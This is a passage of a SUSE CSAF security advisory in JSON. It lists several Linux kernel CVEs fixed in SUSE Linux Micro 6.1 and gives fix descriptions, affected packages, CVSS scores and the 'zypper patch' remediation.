"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53797"
},
{
"cve": "CVE-2023-53799",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53799"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: api - Use work queue in crypto_destroy_instance\n\nThe function crypto_drop_spawn expects to be called in process\ncontext. However, when an instance is unregistered while it still\nhas active users, the last user may cause the instance to be freed\nin atomic context.\n\nFix this by delaying the freeing to a work queue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53799",
"url": "https://www.suse.com/security/cve/CVE-2023-53799"
},
{
"category": "external",
"summary": "SUSE Bug 1254732 for CVE-2023-53799",
"url": "https://bugzilla.suse.com/1254732"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53799"
},
{
"cve": "CVE-2023-53807",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53807"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: clocking-wizard: Fix Oops in clk_wzrd_register_divider()\n\nSmatch detected this potential error pointer dereference\nclk_wzrd_register_divider(). If devm_clk_hw_register() fails then\nit sets \"hw\" to an error pointer and then dereferences it on the\nnext line. Return the error directly instead.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53807",
"url": "https://www.suse.com/security/cve/CVE-2023-53807"
},
{
"category": "external",
"summary": "SUSE Bug 1254724 for CVE-2023-53807",
"url": "https://bugzilla.suse.com/1254724"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53807"
},
{
"cve": "CVE-2023-53808",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53808"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mwifiex: fix memory leak in mwifiex_histogram_read()\n\nAlways free the zeroed page on return from \u0027mwifiex_histogram_read()\u0027.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53808",
"url": "https://www.suse.com/security/cve/CVE-2023-53808"
},
{
"category": "external",
"summary": "SUSE Bug 1254723 for CVE-2023-53808",
"url": "https://bugzilla.suse.com/1254723"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53808"
},
{
"cve": "CVE-2023-53813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: fix rbtree traversal bug in ext4_mb_use_preallocated\n\nDuring allocations, while looking for preallocations(PA) in the per\ninode rbtree, we can\u0027t do a direct traversal of the tree because\next4_mb_discard_group_preallocation() can paralelly mark the pa deleted\nand that can cause direct traversal to skip some entries. This was\nleading to a BUG_ON() being hit [1] when we missed a PA that could satisfy\nour request and ultimately tried to create a new PA that would overlap\nwith the missed one.\n\nTo makes sure we handle that case while still keeping the performance of\nthe rbtree, we make use of the fact that the only pa that could possibly\noverlap the original goal start is the one that satisfies the below\nconditions:\n\n 1. It must have it\u0027s logical start immediately to the left of\n (ie less than) original logical start.\n\n 2. It must not be deleted\n\nTo find this pa we use the following traversal method:\n\n1. Descend into the rbtree normally to find the immediate neighboring\nPA. Here we keep descending irrespective of if the PA is deleted or if\nit overlaps with our request etc. The goal is to find an immediately\nadjacent PA.\n\n2. If the found PA is on right of original goal, use rb_prev() to find\nthe left adjacent PA.\n\n3. Check if this PA is deleted and keep moving left with rb_prev() until\na non deleted PA is found.\n\n4. This is the PA we are looking for. Now we can check if it can satisfy\nthe original request and proceed accordingly.\n\nThis approach also takes care of having deleted PAs in the tree.\n\n(While we are at it, also fix a possible overflow bug in calculating the\nend of a PA)\n\n[1] https://lore.kernel.org/linux-ext4/CA+G9fYv2FRpLqBZf34ZinR8bU2_ZRAUOjKAD3+tKRFaEQHtt8Q@mail.gmail.com/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53813",
"url": "https://www.suse.com/security/cve/CVE-2023-53813"
},
{
"category": "external",
"summary": "SUSE Bug 1254717 for CVE-2023-53813",
"url": "https://bugzilla.suse.com/1254717"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53813"
},
{
"cve": "CVE-2023-53815",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53815"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nposix-timers: Prevent RT livelock in itimer_delete()\n\nitimer_delete() has a retry loop when the timer is concurrently expired. On\nnon-RT kernels this just spin-waits until the timer callback has completed,\nexcept for posix CPU timers which have HAVE_POSIX_CPU_TIMERS_TASK_WORK\nenabled.\n\nIn that case and on RT kernels the existing task could live lock when\npreempting the task which does the timer delivery.\n\nReplace spin_unlock() with an invocation of timer_wait_running() to handle\nit the same way as the other retry loops in the posix timer code.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53815",
"url": "https://www.suse.com/security/cve/CVE-2023-53815"
},
{
"category": "external",
"summary": "SUSE Bug 1254715 for CVE-2023-53815",
"url": "https://bugzilla.suse.com/1254715"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53815"
},
{
"cve": "CVE-2023-53819",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53819"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\namdgpu: validate offset_in_bo of drm_amdgpu_gem_va\n\nThis is motivated by OOB access in amdgpu_vm_update_range when\noffset_in_bo+map_size overflows.\n\nv2: keep the validations in amdgpu_vm_bo_map\nv3: add the validations to amdgpu_vm_bo_map/amdgpu_vm_bo_replace_map\n rather than to amdgpu_gem_va_ioctl",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
